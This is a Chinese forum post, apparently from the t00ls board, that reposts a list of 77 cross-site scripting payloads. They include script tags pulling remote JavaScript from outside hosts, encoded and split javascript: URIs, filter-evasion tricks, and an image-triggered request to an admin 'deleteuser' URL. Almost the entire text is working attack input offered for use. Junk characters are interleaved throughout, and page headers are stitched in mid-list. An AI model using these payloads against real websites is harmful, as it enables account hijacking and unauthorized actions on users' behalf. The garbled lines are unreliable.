貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
& j7 x4 f$ d/ M$ @) Z/ E(1)普通的XSS JavaScript注入 o/ w8 `, h( |' v' n
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! x+ H- z0 x8 v* g8 m, Z(2)IMG标签XSS使用JavaScript命令. ], H& ? H" ]9 O/ A
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- M4 b9 X o0 l4 A; B6 X
(3)IMG标签无分号无引号1 D- `+ n/ |3 Z6 c4 H1 I
<IMG SRC=javascript:alert(‘XSS’)>! G+ M( Z0 s( k5 T# d
(4)IMG标签大小写不敏感
* S( F! a# E( M& A; o6 W9 |9 M<IMG SRC=JaVaScRiPt:alert(‘XSS’)>/ d X" F8 o. e& E/ l. Y$ z# D0 j
(5)HTML编码(必须有分号)4 L0 O" y7 [8 E0 B
<IMG SRC=javascript:alert(“XSS”)>* r" [/ \" L2 y/ c/ R
(6)修正缺陷IMG标签2 }$ E8 }5 _& Q
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
' z( d/ z+ I/ b" B, B5 b4 o
# s& A, c0 b; W, n
3 h- C% N) v% f' ^9 Z6 q(7)formCharCode标签(计算器)
, S* n8 C/ t. J% @8 D4 A4 G% L& f/ N<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>. h: P% o% ~0 g0 _9 D7 T/ z
(8)UTF-8的Unicode编码(计算器); g8 C* H a6 o2 j1 k% B
<IMG SRC=jav..省略..S')>
, m5 X$ J% ?/ ?9 K8 _- v(9)7位的UTF-8的Unicode编码是没有分号的(计算器)& p$ M( c2 q9 H% J3 I& |, ~
<IMG SRC=jav..省略..S')>& d1 _) H/ U3 u" m$ v! l
(10)十六进制编码也是没有分号(计算器); x8 e" F) j- H2 b4 |( Y
<IMG SRC=java..省略..XSS')>. }7 w6 T9 z+ x* X9 X, e
(11)嵌入式标签,将Javascript分开0 |4 j6 `6 @) c
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; H0 s1 S1 ]6 ?* w" U(12)嵌入式编码标签,将Javascript分开7 T9 [- R8 E, D2 w- s* T
<IMG SRC=”jav ascript:alert(‘XSS’);”># F( H! w3 Z! b1 S5 {7 d- Z5 [
(13)嵌入式换行符& O/ O* U' c4 {
<IMG SRC=”jav ascript:alert(‘XSS’);”>' M2 @% q, A4 B e& O4 z9 [0 a3 s
(14)嵌入式回车
! Y& c0 c' d2 g Q' c3 R. w: n<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 r# ^$ Q* T) I(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ i. T! q" ~6 n: X r* @<IMG SRC=”javascript:alert(‘XSS‘)”>
+ V: D4 q7 Y x" [" A7 E9 a4 Q3 v(16)解决限制字符(要求同页面), W5 z! L" n& u6 h6 b- _1 l
<script>z=’document.’</script>
+ o6 v! K( @; @7 v- j8 R' x<script>z=z+’write(“‘</script>
0 a6 @, d7 h0 Y, e) `7 @<script>z=z+’<script’</script>
' z& A6 ^ l9 S/ ^<script>z=z+’ src=ht’</script>
6 s# L: a% K; Y% ^<script>z=z+’tp://ww’</script>; _/ T& w2 {' `. f& d; A: [" f
<script>z=z+’w.shell’</script>
; _5 `% @( X `/ S1 n, s% N+ p( ]<script>z=z+’.net/1.’</script>
- H! c+ g# W$ l% `! A+ |1 K% w<script>z=z+’js></sc’</script>
4 V# H( T! O' a9 z7 U/ n2 K% h4 y" l<script>z=z+’ript>”)’</script>5 p4 q1 i u# \) z
<script>eval_r(z)</script>
9 F) L; p/ a `+ g4 ? L+ j, N(17)空字符12-7-1 T00LS - Powered by Discuz! Board
) [) v: O- j( B) Ehttps://www.t00ls.net/viewthread ... table&tid=15267 2/6# g; ?: t6 |; R: j7 d
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# \$ F6 t2 `" z9 g# p) E2 q(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用6 r. A0 t: m" ^5 [$ Z; N% w
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 Y$ w. s* x. }0 ^# V
(19)Spaces和meta前的IMG标签
# \7 B& I) O0 ~* x# D& s<IMG SRC=” javascript:alert(‘XSS’);”> i+ f+ z+ F+ d2 b% C
(20)Non-alpha-non-digit XSS# i3 d" c7 H6 A: |/ m
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
, t) k% m ]4 v3 b(21)Non-alpha-non-digit XSS to 2
- A5 p, N& D. }' y4 G1 t. U<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>6 ~& A# ~$ `1 T3 f
(22)Non-alpha-non-digit XSS to 3$ q( u8 s4 y- Q4 S! G
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) I5 @7 ~5 a ~- u/ B% l(23)双开括号: s, n, S7 V3 Z$ h2 v2 s2 g& N; J
<<SCRIPT>alert(“XSS”);//<</SCRIPT>& V( {3 j' f" t( {: o3 @! `
(24)无结束脚本标记(仅火狐等浏览器)( R4 {# S9 v4 v2 P
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>/ \. u6 _) H" s$ {$ L
(25)无结束脚本标记2
: l* q, W! X3 F {- U& M2 | P<SCRIPT SRC=//3w.org/XSS/xss.js>. H/ y8 E3 r8 o2 u
(26)半开的HTML/JavaScript XSS4 y3 x8 x& a; v
<IMG SRC=”javascript:alert(‘XSS’)”
" w6 O- p' \2 w) y, j; N& c, b, D(27)双开角括号3 a2 x. b- \9 h
<iframe src=http://3w.org/XSS.html <7 {5 h% E& m, T
(28)无单引号 双引号 分号 s0 a, N* Q7 q i9 x
<SCRIPT>a=/XSS/
# ~; k& o; @, g& e1 lalert(a.source)</SCRIPT>
% L! P6 m1 {/ K7 o, F(29)换码过滤的JavaScript3 h$ }" i" ^9 Y4 o0 x
\”;alert(‘XSS’);//
- s4 r8 }) {+ A7 q: j* F2 y(30)结束Title标签2 Q i+ s5 K# d& ?( l5 v
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>( \* }# }7 d! K( h' E) I" {) G
(31)Input Image
/ G( T' w A+ K& b: J/ z- p; J<INPUT SRC=”javascript:alert(‘XSS’);”>. z( f; ~3 k5 ]$ V( V9 G. F1 h
(32)BODY Image
- ~1 W* o2 z0 l+ {3 b<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ i/ o/ y3 Y4 t7 e; V- c(33)BODY标签' [: q) n5 i! _# L, i# L
<BODY(‘XSS’)>
, T7 s( }" g& u" \2 p(34)IMG Dynsrc
4 e7 d2 D) f, r<IMG DYNSRC=”javascript:alert(‘XSS’)”>5 e7 b3 O* n$ ?" p8 H: f
(35)IMG Lowsrc2 W0 }' b3 V- V
<IMG LOWSRC=”javascript:alert(‘XSS’)”>) Q$ E M9 M0 S
(36)BGSOUND0 I: X( c# W% Q1 e
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
) n+ V7 I( l. s- i! e(37)STYLE sheet
. c k8 N0 o7 I# m7 R<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
3 a9 u& n1 o; w$ x+ t+ ^(38)远程样式表0 V9 }" E3 L0 Y) q, e3 J& G( Q* ?, u9 d
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 \ @! l# e7 [/ e2 k4 e
(39)List-style-image(列表式)8 m: [8 b8 V. D% ^9 G( g
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! F0 @. e3 q9 y- }$ n2 e(40)IMG VBscript
1 F) ^( \2 C8 S<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS2 @8 A; c( W4 r. {) I
(41)META链接url/ w% S! W% P' q g( K
1 V" u" k. Q2 w- H% K
v0 Y c" k- ~* q4 S; C. X<META HTTP-EQUIV=”refresh” CONTENT=”0;
& k% e6 K- z/ tURL=http://;URL=javascript:alert(‘XSS’);”>+ O2 h+ P7 p* G6 \+ S
(42)Iframe
2 _7 T) ^8 l9 J- A# a! ?+ l% d<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>3 s. ~* ~# P$ j" ?5 p, c
(43)Frame s( L1 d+ F0 W S8 d4 z
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board- }9 ^& f* O! I* z: I% B |
https://www.t00ls.net/viewthread ... table&tid=15267 3/6! t5 e! d. Z. `( d; P
(44)Table" X7 |* g' w7 H# Y+ q3 Q
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>' N6 }" i3 T( x' ?: s9 \
(45)TD' U6 t8 k( |0 f5 V7 H4 S7 D% u$ l
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
8 n) {, c& d S! ]0 M(46)DIV background-image
( e$ P1 K7 H6 F# x4 e, l. j<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 J/ P& O1 q X) z* s+ r" E2 G
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
7 J. n& G( w3 Z9 U8&13&12288&65279). i7 g: C1 ]3 ?
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 [; Q$ y* m! L* k1 f; G
(48)DIV expression/ i" i! ]8 ^( l- p+ L
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>0 @: \/ m( {- B6 ?
(49)STYLE属性分拆表达
1 V8 B! v% F' [5 G<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; D/ Z1 G1 Y! D/ \- M; h c(50)匿名STYLE(组成:开角号和一个字母开头)
4 P: O4 |+ k- u<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>' n- k1 q3 S0 z5 R* D E
(51)STYLE background-image9 l+ P* G/ d* W2 q, e
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
) k5 Q Y( ~; P0 e( sCLASS=XSS></A>6 _( Q$ p9 `1 x- w, M
(52)IMG STYLE方式
: v) c- M( j, a9 Mexppression(alert(“XSS”))’>4 p% d6 q( y% ]# p7 d3 d6 t
(53)STYLE background
- I0 X! c# B- C2 B2 D. [0 G<STYLE><STYLE
5 p# H7 N7 H, I1 Ftype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 l; N* C1 O; y- x(54)BASE/ W1 p4 K0 ~. @ w' c: |/ {* b
<BASE HREF=”javascript:alert(‘XSS’);//”> H6 E, `9 p1 u' D* U8 V
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS& ]/ X5 }/ e7 ^& {' J( ?
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>, F+ i0 l2 K+ ~3 X' Q
(56)在flash中使用ActionScrpt可以混进你XSS的代码2 o0 R y- ^' }5 s! _$ U! c
a=”get”;. R% J* b" l2 k, N
b=”URL(\”";, [8 G) ]9 U6 N
c=”javascript:”;
5 c/ s& v' d4 @2 Q0 h, P0 X' Z) Rd=”alert(‘XSS’);\”)”;
8 v/ P. |; }6 h8 geval_r(a+b+c+d);
# ^: _! i+ w" |1 X9 ^. d0 W(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上9 @3 z9 Z# N2 B/ }. p0 U
<HTML xmlns:xss>
( ^. A1 V# |4 g2 g<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
2 i; [+ J7 ~( V: |! ?<xss:xss>XSS</xss:xss>
9 q9 y" T- x( R3 c1 B# g$ N0 H</HTML>: f; K/ ?; q: g( A
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. A) [! ]9 l0 A- g, i5 {8 U<SCRIPT SRC=””></SCRIPT>
+ A( N# H" {" a" s(59)IMG嵌入式命令,可执行任意命令
* K& Y+ }& _# h) q+ R9 g<IMG SRC=”http://www.XXX.com/a.php?a=b”> K- K' ~/ |5 U9 o% E/ b
(60)IMG嵌入式命令(a.jpg在同服务器)+ \! `, U% O+ j% W/ ?5 p: [( p; A
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
4 R+ o; T. { y1 v6 I4 C6 Z- E1 ~(61)绕符号过滤4 w9 d, u6 f6 h% e0 I* R& _; q9 u
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 K0 M6 S% u9 i9 g(62)) g9 `, N" ]6 h3 y% l) I' g8 T" \
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>2 B, { j6 ]" z" K9 e& K6 d
(63)0 s8 S A% P8 W5 u4 N n: U7 Y
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>2 O9 F: W! x8 F9 j9 H; q
(64)
: z! j7 W& X1 H- f1 Q4 F<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT> g- u, F" @. p! w# P
(65) x. J% w/ v" h+ D7 g0 N& _
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
& {. N7 i) W: O) s# x(66)12-7-1 T00LS - Powered by Discuz! Board" P$ l8 H0 b8 ]4 f8 o
https://www.t00ls.net/viewthread ... table&tid=15267 4/69 i# L' F* O8 r9 l2 F$ S2 ~
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>0 G4 m. U) V6 u5 x1 C9 E
(67)$ e: @7 T+ r" F- ~2 M- ^1 l6 A( a
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>* A* Y# s y. w# z1 o+ ^& E
</SCRIPT>
% d" e$ `# [- u" C: t(68)URL绕行6 f) x6 ]' X) b+ I4 t! s
<A HREF=”http://127.0.0.1/”>XSS</A>
- O8 Y# X8 g& E(69)URL编码7 C9 u2 l; z. d( J7 }; X8 [4 [( q
<A HREF=”http://3w.org”>XSS</A>5 U- |3 ]/ {4 |2 M" T
(70)IP十进制
2 R6 X8 }: \9 Z) j% B$ C<A HREF=”http://3232235521″>XSS</A>- M; d% \$ p5 B7 }& o( u
(71)IP十六进制
/ _4 C' f" O7 m( A4 T( i7 F" U6 U% ~<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
G: g1 w- q7 u4 B" s4 C(72)IP八进制
* D& `" B \1 p* k; n1 h, Y d0 L<A HREF=”http://0300.0250.0000.0001″>XSS</A>
; t {1 t0 m# h" H A4 K* J4 l0 r- s(73)混合编码
1 s( P% d: h( } ?1 ^2 Y H+ {<A HREF=”h
- H) O/ ^/ G8 S9 xtt p://6 6.000146.0×7.147/”">XSS</A>. M& {" K# x: Y- H: [
(74)节省[http:], U: ~2 i) }6 l
<A HREF=”//www.google.com/”>XSS</A>4 W3 U9 F. _) f
(75)节省[www]
9 W6 p6 }9 S7 X$ ]<A HREF=”http://google.com/”>XSS</A>
! z" L9 c2 v5 @ w3 z v! n(76)绝对点绝对DNS' w: U8 y: |* m; `( @4 k! B3 a5 H
<A HREF=”http://www.google.com./”>XSS</A>
9 t5 n8 @ F7 P. `(77)javascript链接! E# B7 J1 v8 x7 G' f
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>, b7 q7 ^: ?* u8 h; u4 Z
; N1 } L8 e" [* M5 `原文地址:http://fuzzexp.org/u/0day/?p=14
8 p2 b' z7 i( d! }# `" v) _( M, S: J$ W0 R
|
发表于 2013-4-19 19:22:37
收藏
支持
反对